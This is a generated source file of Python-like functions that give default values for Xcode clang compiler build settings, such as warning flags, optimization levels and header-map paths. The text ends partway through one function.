def _com_apple_compilers_llvm_clang_1_0__GCC_PRECOMPILE_PREFIX_HEADER__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_INCREASE_PRECOMPILED_HEADER_SHARING__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_GENERATE_DEBUGGING_SYMBOLS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_OPTIMIZATION_LEVEL__DefaultValue(xcconfigs, id_configs):
# s
return (False, "s")
def _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_0__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_1__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_2__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_3__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_s__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_fast__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_z__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__LLVM_IMPLICIT_AGGRESSIVE_OPTIMIZATIONS__DefaultValue(xcconfigs, id_configs):
# $(LLVM_OPTIMIZATION_LEVEL_VAL_$(GCC_OPTIMIZATION_LEVEL))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_OPTIMIZATION_LEVEL"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "LLVM_OPTIMIZATION_LEVEL_VAL_{eval_val_0}".format(eval_val_0 = eval_val_0)
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_compilers_llvm_clang_1_0__LLVM_LTO__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_NO_COMMON_BLOCKS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_REUSE_STRINGS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_DYNAMIC_NO_PIC__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_KERNEL_DEVELOPMENT__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_TREAT_WARNINGS_AS_ERRORS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_TREAT_IMPLICIT_FUNCTION_DECLARATIONS_AS_ERRORS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_TREAT_INCOMPATIBLE_POINTER_TYPE_WARNINGS_AS_ERRORS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_FIELD_INITIALIZERS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_PROTOTYPES__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_RETURN_TYPE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DOCUMENTATION_COMMENTS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_UNREACHABLE_CODE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_NULLABLE_TO_NONNULL_CONVERSION__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_IMPLICIT_ATOMIC_PROPERTIES__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DIRECT_OBJC_ISA_USAGE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_INTERFACE_IVARS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_MISSING_PROPERTY_SYNTHESIS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_ROOT_CLASS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_REPEATED_USE_OF_WEAK__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_EXPLICIT_OWNERSHIP_TYPE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_NON_VIRTUAL_DESTRUCTOR__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_HIDDEN_VIRTUAL_FUNCTIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN__EXIT_TIME_DESTRUCTORS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN__ARC_BRIDGE_CAST_NONARC__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN__DUPLICATE_METHOD_MATCH__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_TYPECHECK_CALLS_TO_PRINTF__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_INITIALIZER_NOT_FULLY_BRACKETED__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_MISSING_PARENTHESES__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_CHECK_SWITCH_STATEMENTS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_FUNCTION__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_LABEL__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_EMPTY_BODY__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNINITIALIZED_AUTOS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNKNOWN_PRAGMAS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_INHIBIT_ALL_WARNINGS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_PEDANTIC__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_SHADOW__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_FOUR_CHARACTER_CONSTANTS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_CONSTANT_CONVERSION__DefaultValue(xcconfigs, id_configs):
# $(CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_INT_CONVERSION__DefaultValue(xcconfigs, id_configs):
# $(CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_BOOL_CONVERSION__DefaultValue(xcconfigs, id_configs):
# $(CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ENUM_CONVERSION__DefaultValue(xcconfigs, id_configs):
# $(CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_FLOAT_CONVERSION__DefaultValue(xcconfigs, id_configs):
# $(CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_NON_LITERAL_NULL_CONVERSION__DefaultValue(xcconfigs, id_configs):
# $(CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_LITERAL_CONVERSION__DefaultValue(xcconfigs, id_configs):
# $(CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_MISSING_NOESCAPE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_PRAGMA_PACK__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_PRIVATE_MODULE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_VEXING_PARSE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DELETE_NON_VIRTUAL_DTOR__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ASSIGN_ENUM__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_SIGN_COMPARE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_MULTIPLE_DEFINITION_TYPES_FOR_SELECTOR__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_STRICT_SELECTOR_MATCH__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNDECLARED_SELECTOR__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_CXX0X_EXTENSIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ATOMIC_IMPLICIT_SEQ_CST__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_TRIVIAL_AUTO_VAR_INIT__DefaultValue(xcconfigs, id_configs):
# uninitialized
return (False, "uninitialized")
def _com_apple_compilers_llvm_clang_1_0__WARNING_CFLAGS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_compilers_llvm_clang_1_0__GCC_PREPROCESSOR_DEFINITIONS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_compilers_llvm_clang_1_0__GCC_PRODUCT_TYPE_PREPROCESSOR_DEFINITIONS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_compilers_llvm_clang_1_0__GCC_PREPROCESSOR_DEFINITIONS_NOT_USED_IN_PRECOMPS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_compilers_llvm_clang_1_0__ENABLE_NS_ASSERTIONS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__ENABLE_STRICT_OBJC_MSGSEND__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__USE_HEADERMAP__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__HEADERMAP_FILE_FORMAT__DefaultValue(xcconfigs, id_configs):
# traditional
return (False, "traditional")
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE__DefaultValue(xcconfigs, id_configs):
# $(TEMP_DIR)/$(PRODUCT_NAME).hmap
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PRODUCT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}.hmap".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_GENERATED_FILES__DefaultValue(xcconfigs, id_configs):
# $(TEMP_DIR)/$(PRODUCT_NAME)-generated-files.hmap
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PRODUCT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}-generated-files.hmap".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_OWN_TARGET_HEADERS__DefaultValue(xcconfigs, id_configs):
# $(TEMP_DIR)/$(PRODUCT_NAME)-own-target-headers.hmap
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PRODUCT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}-own-target-headers.hmap".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_ALL_TARGET_HEADERS__DefaultValue(xcconfigs, id_configs):
# $(TEMP_DIR)/$(PRODUCT_NAME)-all-target-headers.hmap
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PRODUCT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}-all-target-headers.hmap".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_ALL_NON_FRAMEWORK_TARGET_HEADERS__DefaultValue(xcconfigs, id_configs):
# $(TEMP_DIR)/$(PRODUCT_NAME)-all-non-framework-target-headers.hmap
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PRODUCT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}-all-non-framework-target-headers.hmap".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_PROJECT_FILES__DefaultValue(xcconfigs, id_configs):
# $(TEMP_DIR)/$(PRODUCT_NAME)-project-headers.hmap
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PRODUCT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}-project-headers.hmap".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_PRODUCT_HEADERS_VFS_FILE__DefaultValue(xcconfigs, id_configs):
# $(PROJECT_TEMP_DIR)/all-product-headers.yaml
used_user_content = False
eval_val_0 = ""
eval_key_0 = "PROJECT_TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, "{eval_val_0}/all-product-headers.yaml".format(eval_val_0 = eval_val_0))
def _com_apple_compilers_llvm_clang_1_0__USE_HEADER_SYMLINKS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADER_SYMLINKS_DIR__DefaultValue(xcconfigs, id_configs):
# $(TEMP_DIR)/$(PRODUCT_NAME).hdrs
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PRODUCT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}.hdrs".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__GCC_USE_GCC3_PFE_SUPPORT__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_PFE_FILE_C_DIALECTS__DefaultValue(xcconfigs, id_configs):
# c objective-c c++ objective-c++
return (False, "c objective-c c++ objective-c++")
def _com_apple_compilers_llvm_clang_1_0__ENABLE_APPLE_KEXT_CODE_GENERATION__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_PARAMETER__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_VARIABLE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_VALUE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_EXCEPTIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_OBJC_EXCEPTIONS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_CW_ASM_SYNTAX__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_UNROLL_LOOPS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_FAST_MATH__Condition(xcconfigs, id_configs):
# $(LLVM_IMPLICIT_AGGRESSIVE_OPTIMIZATIONS) == NO
used_user_content = False
eval_val_0 = ""
eval_key_0 = "LLVM_IMPLICIT_AGGRESSIVE_OPTIMIZATIONS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
